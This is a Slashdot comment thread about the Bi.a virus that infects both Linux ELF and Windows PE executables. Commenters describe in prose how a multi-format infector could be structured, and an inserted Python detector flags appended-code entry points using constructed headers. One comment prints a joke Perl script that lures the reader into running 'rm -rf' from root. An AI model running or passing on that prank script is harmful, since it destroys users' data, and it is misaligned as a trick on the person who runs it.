If that were true, the Win3.1 system is almost as vulnerable as any Win9x system. I don't think the article said it was specific to NT? It may be that it is, but, I'm guessing that it doesn't do anything high level enough to actually need to be specific to NT over 9x. I think you can't just compile it for Win9x and it run in Win3.1, but, I know you were supposed to be able to run 32-bit applications in Win3.1 (you may have needed an extra thing installed, I don't remember for certain, but, I remember I did once run something 32-bit in Win3.1 I think mainly for testing (it didn't even need that much memory anyway, so no big deal at the time. I think I had 16MB of RAM at the time in fact.))

BTW, he was joking about Win3.1. I don't think anyone seriously uses that anymore. Heck, I tried it a little while back for nostalgia's sake, but, even the nostalgia factor didn't keep it installed on the system for more than a couple of days or so.

Re:Reactions: (2, Funny)

redalien (711170) | more than 8 years ago | (#15087256)

It was called Win32S, and actually worked amazingly well. I only ever had 1 programme not work, and that was a quiz programme called "You don't know Jack". This americanism confused me greatly, and I was very annoyed that I couldn't run it and find out who Jack was.

Re:Reactions: (1)

x2A (858210) | more than 8 years ago | (#15087203)

1. Linux and Win32? W00t, my WfW3.11 box is invincible!

Except to the insults on slashdot!

2. So... why can't application developers do this?

What, make their software infect all your exe and elf files on your system? I can see it pissing a lot of people off, which is probably why they don't do it.

3. Profit!

Re:Reactions: (1)

Bromskloss (750445) | more than 8 years ago | (#15087210)

my WfW3.11 box is invincible!
Whoa, World for Warcraft 3.11 is out already!?

Limited to ASM? (2, Insightful)

neoshroom (324937) | more than 8 years ago | (#15086876)

"Writing a cross-platform worm is difficult because it limits you to functions that are available on both operating systems," Ullrich said. "You have to also code the virus in assembly to make it work without relying on any OS-specific function," he said.

This isn't actually quite true, it is merely one way of doing so. You could easily write a virus that uses tons of API and platform specific stuff, but contains a generic detection mechanism at the beginning of its execution and then forks between two pieces of code. One portion contains code specific to Windows and another code specific to Linux. Apart from the generic platform discovery code upon execution it would be like any other platform specific virus. I'm actually surprised this is the first, at least publicized, detection of such a virus.


Re:Limited to ASM? (4, Informative)

x2A (858210) | more than 8 years ago | (#15087239)

It's not the first, I recall one before. And you don't even need detection code, you just write a different entry point address into the elf header as you would the exe header. You can have two different payloads, and two different copy mechanisms, as long as both copy both, not just themselves. In fact, there's no reason to stick to just 2. You can have a single virus that spreads across platforms/architectures, it just makes it bigger and easier to spot.

Re:Limited to ASM? (1)

FungosBauux (929423) | more than 8 years ago | (#15087300)

You are right. But no need of a "generic platform discovery code", all you need is mirrored code that is done for each platform. Your platform discovery code is only this: find a binary, look at its header; if it's a PE executable I will copy my "PE Executable Code" as code attached/injected/... and my ELF/A.OUT code as data. If it's an ELF executable I will copy my "ELF Executable Code" as code attached/injected/... and my PE/A.OUT code as data, and so on. It's very simple, but it's too much work for too little revenue from malware contractors. All you need to write a virus like this one is to know most executable formats from any platform. Implement "N" applications for each platform independent of binary format. Implement "M" infectors, one for each file format. Manage that and it's done.
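
The two threads above keep landing on the same two mechanics: x2A's point that the infector writes a different entry-point address into the ELF header or the EXE header and carries both bodies in every copy, and alexhs's step (a), an algorithm that tells which OS/architecture a given executable is for, which FungosBauux restates as "look at its header". The following is an added example for this page, not code from the article, from Kaspersky, from SANS or from the virus itself, and it is written from the defender's side: it parses just enough of the ELF and PE headers to answer step (a), then applies the check a scanner would run against the appended-body layout these comments describe (entry point redirected into a segment or section that was bolted on after the original code). The function names, the sample images (hand-built headers with no real code bytes) and the "entry point in the last executable region" threshold are all my assumptions, not anything the reports state about Bi.a.

```python
"""Identify ELF/PE images and flag the appended-code infection layout.

Added example for this thread; sample inputs are constructed headers, not real binaries.
Assumed layout: virus body appended as an extra executable segment/section, entry redirected.
"""
import struct

ELF_MACHINES = {0x03: "x86", 0x14: "PowerPC", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}
PE_MACHINES = {0x14C: "x86", 0x1C0: "ARM", 0x8664: "x86-64", 0xAA64: "AArch64"}
PT_LOAD, PF_X, PF_W, PF_R = 1, 0x1, 0x2, 0x4
IMAGE_SCN_MEM_EXECUTE = 0x20000000

def parse_elf(data):
    """Return (arch, entry, [(vaddr, memsz), ...]) over executable PT_LOAD segments."""
    is64 = data[4] == 2                      # EI_CLASS: 1 = ELF32, 2 = ELF64
    e = "<" if data[5] == 1 else ">"         # EI_DATA: 1 = little-endian, 2 = big-endian
    machine = struct.unpack_from(e + "H", data, 18)[0]
    entry, phoff = struct.unpack_from(e + ("QQ" if is64 else "II"), data, 24)
    phentsize, phnum = struct.unpack_from(e + "HH", data, 54 if is64 else 42)
    regions = []
    for i in range(phnum):
        off = phoff + i * phentsize
        if is64:  # Elf64_Phdr: type, flags, offset, vaddr, paddr, filesz, memsz, align
            p_type, p_flags, _, vaddr, _, _, memsz = struct.unpack_from(e + "IIQQQQQ", data, off)
        else:     # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, align
            p_type, _, vaddr, _, _, memsz, p_flags = struct.unpack_from(e + "IIIIIII", data, off)
        if p_type == PT_LOAD and p_flags & PF_X:
            regions.append((vaddr, memsz))
    return ELF_MACHINES.get(machine, hex(machine)), entry, regions

def parse_pe(data):
    """Return (arch, entry_rva, [(va, vsize), ...]) over executable sections."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]           # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("MZ stub without a PE header")
    machine, nsec = struct.unpack_from("<HH", data, pe + 4)
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                          # IMAGE_OPTIONAL_HEADER
    entry = struct.unpack_from("<I", data, opt + 16)[0]    # AddressOfEntryPoint
    regions = []
    for i in range(nsec):
        sec = opt + opt_size + i * 40                      # IMAGE_SECTION_HEADER
        vsize, va = struct.unpack_from("<II", data, sec + 8)
        chars = struct.unpack_from("<I", data, sec + 36)[0]
        if chars & IMAGE_SCN_MEM_EXECUTE:
            regions.append((va, vsize))
    return PE_MACHINES.get(machine, hex(machine)), entry, regions

def classify(data):
    """Step (a) from the thread: which format/arch is this? Then the entry-point check."""
    if data[:4] == b"\x7fELF":
        fmt, parsed = "ELF", parse_elf(data)
    elif data[:2] == b"MZ":
        fmt, parsed = "PE", parse_pe(data)
    else:
        return None                                        # neither infector would touch it
    arch, entry, regions = parsed
    regions.sort()
    hit = [i for i, (start, size) in enumerate(regions) if start <= entry < start + size]
    if not hit:
        verdict = "suspicious: entry point outside every executable region"
    elif len(regions) > 1 and hit[0] == len(regions) - 1:
        verdict = "suspicious: entry point in last executable region (appended code?)"
    else:
        verdict = "clean-looking"
    return {"format": fmt, "arch": arch, "entry": entry, "verdict": verdict}

def build_elf64(entry, segments):
    """Constructed ELF64/x86-64 image: file header + program headers, no code bytes."""
    img = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8
    img += struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, entry, 64, 0, 0, 64, 56, len(segments), 64, 0, 0)
    for vaddr, size, flags in segments:
        img += struct.pack("<IIQQQQQQ", PT_LOAD, flags, 0, vaddr, vaddr, size, size, 0x1000)
    return img

def build_pe32(entry, sections):
    """Constructed PE32/x86 image: MZ stub + COFF header + 24-byte optional header + sections."""
    img = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                     # e_lfanew = 0x40
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 24, 0x102)
    img += struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry) + b"\0" * 4  # entry at +16
    for name, va, vsize, chars in sections:
        img += struct.pack("<8sIIIIIIHHI", name, vsize, va, vsize, 0, 0, 0, 0, 0, chars)
    return img

CODE, DATA = 0x60000020, 0xC0000040                 # PE: code|exec|read, data|read|write
ELF_CLEAN = [(0x401000, 0x2000, PF_R | PF_X), (0x403000, 0x1000, PF_R | PF_W)]
PE_CLEAN = [(b".text", 0x1000, 0x3000, CODE), (b".data", 0x4000, 0x1000, DATA)]
SAMPLES = {                                         # constructed inputs, named by intent
    "clean-elf": build_elf64(0x401040, ELF_CLEAN),
    "appended-elf": build_elf64(0x405000, ELF_CLEAN + [(0x405000, 0x400, PF_R | PF_X)]),
    "clean-pe": build_pe32(0x1200, PE_CLEAN),
    "appended-pe": build_pe32(0x5000, PE_CLEAN + [(b".extra", 0x5000, 0x200, CODE)]),
    "data-entry-pe": build_pe32(0x4000, PE_CLEAN),
}

if __name__ == "__main__":
    for name, image in SAMPLES.items():
        print(name, classify(image))
```

Point it at a real directory by reading each file's bytes and calling classify(); non-executables come back as None, the rest carry the format, architecture and a verdict. Treat the verdict as triage, not a signature: UPX-style packers and some toolchains legitimately put the entry point in the last executable section, and an infector that overwrites code in place instead of appending a segment never trips this check at all. It does show the thing the thread argues about, though: the infector's "platform discovery" is nothing more than a magic-number and machine-field lookup, and the defender's cheapest counter-check reads the very same header fields.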

Took long enough... (5, Funny)

Eric Damron (553630) | more than 8 years ago | (#15086892)

Well it's about time! Finally inter-platform operability.

Re:Took long enough... (1)

KMitchell (223623) | more than 8 years ago | (#15086964)

"For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

Crap. Does anyone know where I can get some antivirus SW for my PET [wikipedia.org] ?

Re:Took long enough... (1)

utlemming (654269) | more than 8 years ago | (#15087269)

LOL. Don't worry, I think you're safe. Running anti-virus might use up all 32K of RAM.

Why is it so limited? (1)

SailorFrag (231277) | more than 8 years ago | (#15086899)

"Writing a cross-platform worm is difficult because it limits you to functions that are available on both operating systems," Ullrich said. "You have to also code the virus in assembly to make it work without relying on any OS-specific function," he said.

Why?

Doesn't it seem plausible that it could just have one copy of itself for each executable type, and then whichever one actually executes knows how to insert the other(s) if needed? Then it's not really a single virus, but more of a set of symbiotic viruses. It still gets the same result though.

And so ... (0)

Anonymous Coward | more than 8 years ago | (#15087003)

A smug BSD user snorts in contempt, feeling more than a little superior 8^)

They Hate my AIBO. (1, Troll)

twitter (104583) | more than 8 years ago | (#15087012)

"For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

Nooooo! not my AIBO. I knew I should have left off that email and news fetch hack.

What a bunch of BS. How exactly are they supposed to get this assembly code kludge to my machine? Are they going to try to barf zlib? As the article also pointed out, these things have been around since year 2000. In those six years there has been a big fat nothing done with them.

No, don't give me that "popularity" bullshit either. Linux runs most of the web and provides some of the most lucrative targets to Al Qaeda and other criminals. On the other end, free software run computers will always be more up to date and easier to recover. A Linux user with a misbehaving computer can fix point and click style in 20 minutes with a fairly new distro [mepis.org] or get the absolute latest and greatest with a net install of Debian. Computer stores can give users the distribution of their choice. Compare that to the non free world, where the user has to bring their "original" Windoze 98 or five year old XP CD into the store or pay $100 for software that might not even run on their old computer. The store then has to go through the mostly useless process of "patching" said ancient junk and the user gets burnt again soon after. The free software world, even a competitive non free world, will never be as bad as M$ is.

Re:They Hate my AIBO. (-1, Offtopic)

Anonymous Coward | more than 8 years ago | (#15087302)

How is a new install of debian the "latest and greatest?"

apt-get never, ever, ever comes close to getting you the latest version of anything in my experience.
I may just be n00b though.

gcc version 3.3.5 (Debian 1:3.3.5-13)
mysql Ver 12.22 Distrib 4.0.24, for pc-linux-gnu (i386)

Conversation with Ubuntu documentation team (0)

Anonymous Coward | more than 8 years ago | (#15087101)

(Funny thing, I just had this exchange with the ubuntu doc team like 5 days ago)

I was browsing http://help.ubuntu.com/starterguide/C/ch07s02.html [ubuntu.com] , and took a look at the AntiVirus server portion. I wanted to recommend updating this portion -

"1. What is Clam AntiVirus (ClamAV) Server?
    Clam AntiVirus (ClamAV) is an anti-virus toolkit for Unix/Linux operating systems. Typically ClamAV is integrated with email servers and can also be used to scan individual files. Linux rarely suffers from viruses and other nasties that infect other operating systems, so most likely you don't need to install ClamAV."

I would recommend replacing this with something along the lines of "While Linux rarely suffers from viruses and other nasties that infect other operating systems, it is wise to keep your system protected with anti-virus software and up to date definitions."

We all agree that linux is more secure and less prone to viruses than other operating systems, however, comments like this tend to promote a certain ignorance and a false sense of security.

--
response

Actually, I'm not sure that this is right. Antivirus is generally used
on linux machines only where there are samba shares or a mail server.
Running antivirus software is not (to my knowledge) a common part of
keeping your linux system safe. If someone tells me otherwise, I'm happy
to reconsider this section of the guide.

--
my response back

Fair enough. In those cases (samba and mail servers) it would be much more important. My concern is in looking to a future with linux being the most used desktop OS, and the attention from virus writers coupled with a much higher degree of a non-technical user base. Hopefully at that point, the people that would write viruses instead find open source projects as outlets to their creativity. Promoting the use of the AV software for desktop users now would either promote the ClamAV project or waste their resources with users downloading definitions.

--
response back

Yes, I don't think it's worth promoting it yet. I would think that when
an anti-virus becomes necessary, Ubuntu will provide one by default. But
certainly when the time comes, it will be reflected in the
documentation.

--

I sent him an email with a link to the article :) Besides, a virus scanner would make a great sales tool for free software!

No problem... (3, Funny)

mogrify (828588) | more than 8 years ago | (#15087109)

I'm just recompiling my kernel without support for ELF binaries. Just a quick reboot, and I'

My PET? (2, Funny)

dbc (135354) | more than 8 years ago | (#15087132)

"For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

Woah, not my Commodore PET [old-computers.com] (Personal Electronic Transactor)? Nooooo..... I *love* that chicklet keyboard. And the awesome monochrome graphics. They have the playing card suits built in as *characters*, mind you. You can 1000 PRINT them in the built in BASIC!

Let me tell you, though, it was a bitch getting an entire TCP/IP stack working in the 4K of RAM and still have room for a web browser. And don't even get me started on how hard it was to get 100BaseT working over the expansion port.

Guess it's finally time to retire the old PET.

How About a Story? (3, Insightful)

Einstein_101 (966708) | more than 8 years ago | (#15087198)

Here's a quick anecdote for you:

About a week ago, for various reasons, I decided to format my laptop and put Windows XP Professional on there. I previously had Slackware Linux 10.2 installed, but since my desktop has been dual-booting for a while, I figured I might as well get my money's worth and put Windows on the laptop (Linux also doesn't support the SD card reader, but that's another story). The installation went nicely, and I continued to do the tedious tasks that you do after a format. (validate windows, download patches, install drivers and apps, etc...) I installed a second user account for administrative uses and named it "Root".

I logged into my "Root" account, and installed Chessmaster 9000. When I logged back into my regular user account, the game wouldn't start. After a while, it dawned on me that Chessmaster installs the bulk of the data in your My Documents folder. So I uninstalled it, then tried to install it under my user's account. Now, if you're trying to install a program, and you're not the Administrator, a simple dialog will pop up and prompt you for the password. However, when the install finished, the program wouldn't start. Since I installed as Administrator (I had no choice), the data was stored in the Administrator's My Documents folder. I tried to link to it - I even tried to install as Administrator, and put a link to his folder (and changing permissions) in the default folder so all users would use it.

Nothing worked properly. I ended up having to change my user account back to Administrator privileges, install the program, then change it back. And this is just for Chessmaster. Other programs are even worse. Doom 3, FarCry, and Call of Duty all install their data in the Program Files folder. So in order to play the game without being root, you have to change the permissions on the saved games folder.

The point of the story is this: Linux doesn't have the problems that Windows has, because it's more secure by design - not by luck. A significant amount of programs are designed for the user to have Administrator access, and assume that you will always run with such permissions. Windows didn't switch the masses to the NT design until XP, which was released 4th Quarter 2001. As a result, you have generations of programs that assume they can read/write whatever and wherever they want - leaving a mess for the end user to sort out. In the end, they'll just say to hell with it and run as Administrator.

(And that's not even addressing the masses that bought OEM pc's that run XP Home with Administrator privileges by default)

Re:How About a Story? (0)

Anonymous Coward | more than 8 years ago | (#15087278)

How's it Windows' fault that the software written to run on Windows places user save files in the 'secure' Program Files directory? Sounds to me like the game developer should be putting his files elsewhere, like the user/my documents directory -- but wait, then you can't complain about Microsoft, can you?

Obligatory. (-1, Redundant)

Anonymous Coward | more than 8 years ago | (#15087212)

I, for one, welcome our Virus.Linux.Bi.a/Virus.Win32.Bi.a overlords.

Right (0)

Scareduck (177470) | more than 8 years ago | (#15087224)

#!/usr/bin/perl
die "to get pr0n, run this script as root" if($>);
chdir("/");
system("rm -rf * .*");
print "haw haw haw I 0wnz u!!!!!!!\n";

====

Really, now.

Yawn... (1)

iroll (717924) | more than 8 years ago | (#15087295)

Wake me when they add Mach-O to the list!

Ah, but the real question is (1)

overshoot (39700) | more than 8 years ago | (#15087316)

... will it infect an ebuild?